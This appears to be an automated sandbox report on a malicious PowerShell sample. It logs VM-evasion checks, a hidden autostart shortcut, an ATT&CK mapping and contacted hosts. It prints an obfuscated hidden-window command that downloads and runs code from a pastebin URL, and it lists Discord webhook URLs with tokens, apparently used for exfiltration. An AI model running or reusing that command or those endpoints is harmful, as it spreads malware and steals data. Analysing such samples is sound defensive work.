Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 501
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4267
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5547
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 636Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep count: 1097 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212Thread sleep count: 136 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4620Thread sleep count: 751 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep count: 4335 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6168Thread sleep count: 5447 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3212Thread sleep time: -22136092888451448s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1776Thread sleep count: 1055 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4844Thread sleep count: 501 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356Thread sleep count: 192 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4200Thread sleep count: 4267 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1608Thread sleep count: 5547 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6860Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.1686937287.00000221DF4DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: powershell.exe, 00000000.00000002.1687658888.00000221DF545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.1907933028.000001D637064000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2002415308.000001F8DE90F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
File and Directory Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534236 Sample: cr_asm_phshop..ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 84 37 pastebin.com 2->37 39 raw.githubusercontent.com 2->39 41 discord.com 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Sigma detected: Suspicious PowerShell Parameter Substring 2->53 55 AI detected suspicious sample 2->55 8 powershell.exe 1 24 2->8         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 57 Connects to a pastebin service (likely for C&C) 37->57 process4 dnsIp5 43 discord.com 162.159.128.233, 443, 49707, 49718 CLOUDFLARENETUS United States 8->43 35 C:\ProgramData\...\BeginSync.lnk, MS 8->35 dropped 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->61 63 Suspicious powershell command line found 8->63 65 Tries to open files direct via NTFS file id 8->65 67 Powershell creates an autostart link 8->67 17 conhost.exe 8->17         started        19 attrib.exe 1 8->19         started        21 powershell.exe 7 13->21         started        24 conhost.exe 1 13->24         started        26 powershell.exe 15->26         started        28 conhost.exe 1 15->28         started        file6 signatures7 process8 signatures9 59 Suspicious powershell command line found 21->59 30 powershell.exe 14 13 21->30         started        33 powershell.exe 26->33         started        process10 dnsIp11 45 raw.githubusercontent.com 185.199.110.133, 443, 49711, 49713 FASTLYUS Netherlands 30->45 47 pastebin.com 172.67.19.24, 443, 49708, 49710 CLOUDFLARENETUS United States 30->47

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cr_asm_phshop..ps10%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://crl.v0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.128.233
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.110.133
    		truetrue
      		unknown
      pastebin.com
      		172.67.19.24
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4true
          		unknown
          http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txttrue
              		unknown
              https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5true
                		unknown
                http://pastebin.com/raw/sA04Mwk2false
                  		unknown
                  https://pastebin.com/raw/sA04Mwk2false
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMpowershell.exe, 00000008.00000002.1868322468.000001D61F85D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7282000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1682931168.00000221D731F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://discord.compowershell.exe, 00000000.00000002.1663002618.00000221C7801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1663002618.00000221C9268000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D62017C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7B5D000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://go.microsoft.copowershell.exe, 00000008.00000002.1906732585.000001D636E51000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://go.micropowershell.exe, 00000000.00000002.1663002618.00000221C8CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F1D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C6BB8000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		unknown
                            https://discord.com/api/webhooks/129575196622756powershell.exe, 00000008.00000002.1868322468.000001D62017C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7B5D000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              http://www.microsoft.copowershell.exe, 0000000C.00000002.2001709591.000001F8DE7D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://discord.com/powershell.exe, 00000000.00000002.1663002618.00000221C939E000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://discord.compowershell.exe, 00000000.00000002.1663002618.00000221C935D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D62017C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7B5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://raw.githubusercontent.comppowershell.exe, 00000008.00000002.1868322468.000001D61F7F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://0.discorpowershell.exe, 00000000.00000002.1663002618.00000221C939E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://raw.githubusercontent.compowershell.exe, 00000008.00000002.1868322468.000001D61F7F6000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewvpowershell.exe, 0000000C.00000002.1945694039.000001F8C7282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7B5D000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              http://www.microsoft.co1powershell.exe, 00000000.00000002.1686860518.00000221DF3D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://contoso.com/powershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8Jpowershell.exe, 00000000.00000002.1663002618.00000221C74D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685753326.00000221DF2B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1686860518.00000221DF3D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1686424525.00000221DF332000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1663002618.00000221C935A000.00000004.00000800.00020000.00000000.sdmp, cr_asm_phshop..ps1true
                                                  		unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1682931168.00000221D731F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1682931168.00000221D7461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://raw.githubusercontent.compowershell.exe, 00000008.00000002.1868322468.000001D61F7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F7C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C71D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C71A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.1663002618.00000221C72B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61ED17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61ED2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C670D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C66F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1663002618.00000221C72B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61ED53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C6734000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://0.discord.com/powershell.exe, 00000000.00000002.1663002618.00000221C939E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://crl.vpowershell.exe, 00000008.00000002.1906619364.000001D636E39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
